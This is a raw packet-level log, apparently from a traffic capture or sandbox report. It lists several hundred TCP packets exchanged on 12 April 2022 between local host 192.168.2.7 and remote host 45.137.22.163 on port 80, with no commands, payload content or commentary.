Apr 12, 2022 21:49:22.347706079 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347735882 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347755909 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347774982 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347804070 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347815990 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347826958 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347857952 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347870111 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347898006 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347913980 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347938061 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347950935 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.347980022 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.347986937 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348018885 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.348037004 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348059893 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.348072052 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348102093 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.348110914 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348141909 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.348165989 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348174095 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.348198891 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348213911 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.348254919 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.348254919 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348292112 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348294020 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.348316908 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348335028 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.348345995 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348387957 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348551989 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.348959923 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.367511988 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.367583036 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.367625952 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.367667913 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.367690086 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.367707968 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.367731094 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.367767096 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.367820978 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.367827892 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.367877960 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.367918015 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.367957115 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.367964983 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.367999077 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368011951 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368040085 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368077993 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368093014 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368119955 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368160009 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368172884 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368197918 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368237972 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368249893 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368277073 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368318081 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368329048 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368366003 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368407965 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368419886 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368448973 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368495941 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368508101 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368535042 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368575096 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368591070 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368614912 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368654966 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368662119 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368683100 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368695021 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368732929 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368748903 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368772984 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368813038 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368822098 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368850946 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368890047 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.368899107 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.368921041 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.369009972 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.369297028 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.371049881 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.371119022 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.371157885 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.371162891 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.371223927 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.371372938 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.371536970 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.371589899 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.371601105 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.371628046 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.371681929 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.372210026 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372337103 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372384071 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372415066 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.372447014 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372498035 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.372503042 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372560024 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372602940 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372610092 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.372656107 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372704983 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.372710943 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372769117 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372813940 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372817993 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.372873068 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372920990 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.372929096 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.372977018 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373018980 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373027086 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.373059034 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373111010 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373116970 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.373157024 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373210907 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.373217106 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373274088 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373328924 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373364925 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.373374939 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373425007 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373440981 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.373471022 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373528957 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373532057 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.373584032 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373635054 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373646021 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.373683929 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373725891 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373765945 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373797894 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.373806953 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373838902 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.373876095 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373908997 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.373910904 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.373963118 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.373970032 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374032974 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374032974 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374102116 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374186039 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374191999 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374219894 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374254942 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374295950 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374305964 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374336004 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374376059 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374382973 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374416113 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374456882 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374466896 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374497890 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374536037 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374547958 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374574900 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374597073 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374615908 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374629021 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374655008 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374696016 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374703884 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374736071 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374775887 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374783993 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374818087 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374857903 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374871016 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374897003 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374937057 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.374943972 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374974012 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.374974966 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375016928 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375024080 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.375056982 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375123024 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375127077 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.375165939 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375205994 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375225067 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.375247002 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375291109 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375314951 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375350952 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.375359058 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375396013 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.375399113 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375442028 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375451088 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.375483036 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375519991 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.375543118 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.376224041 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.377331972 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.391783953 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.391859055 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.391918898 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.391946077 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.391982079 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392050028 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392091036 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.392107964 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392185926 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392190933 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.392311096 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392355919 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392406940 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392417908 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.392448902 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392479897 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.392489910 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392532110 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392561913 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.392571926 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392605066 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392637014 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.392644882 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392688990 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392735004 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392754078 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.392774105 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392817974 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392832041 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.392859936 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392899990 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392921925 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.392941952 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392981052 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.392997026 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.393022060 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393065929 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393088102 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.393150091 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393222094 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393245935 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.393263102 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393383026 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393419981 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.393434048 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393502951 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393510103 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.393589973 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393632889 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393657923 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.393676043 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393794060 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393836975 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393856049 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.393876076 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393907070 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.393934965 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.394136906 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.394221067 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.394264936 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.394274950 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.394305944 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.394332886 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.394357920 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.398564100 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.398643017 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.398704052 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.398732901 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.398772955 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.398849964 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.398885012 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.398933887 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.398989916 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.398993015 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.399051905 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399122953 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399135113 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.399188042 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399246931 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399266958 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.399310112 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399369001 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399374962 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.399431944 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399492025 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.399492025 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399550915 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399605989 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.399609089 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399667025 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399745941 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.399784088 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399852037 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.399909019 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.399909973 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400335073 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400366068 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400413990 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.400430918 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400485992 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.400495052 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400548935 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400604963 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.400608063 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400670052 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400719881 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.400728941 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400791883 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400842905 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.400854111 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400917053 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400957108 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.400979042 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.401015997 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401067972 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.401072025 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401137114 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401202917 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.401213884 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401249886 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401307106 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401360035 CEST	49780	80	192.168.2.7	45.137.22.163
Apr 12, 2022 21:49:22.401361942 CEST	80	49780	45.137.22.163	192.168.2.7
Apr 12, 2022 21:49:22.401420116 CEST	80	49780	45.137.22.163	192.168.2.7
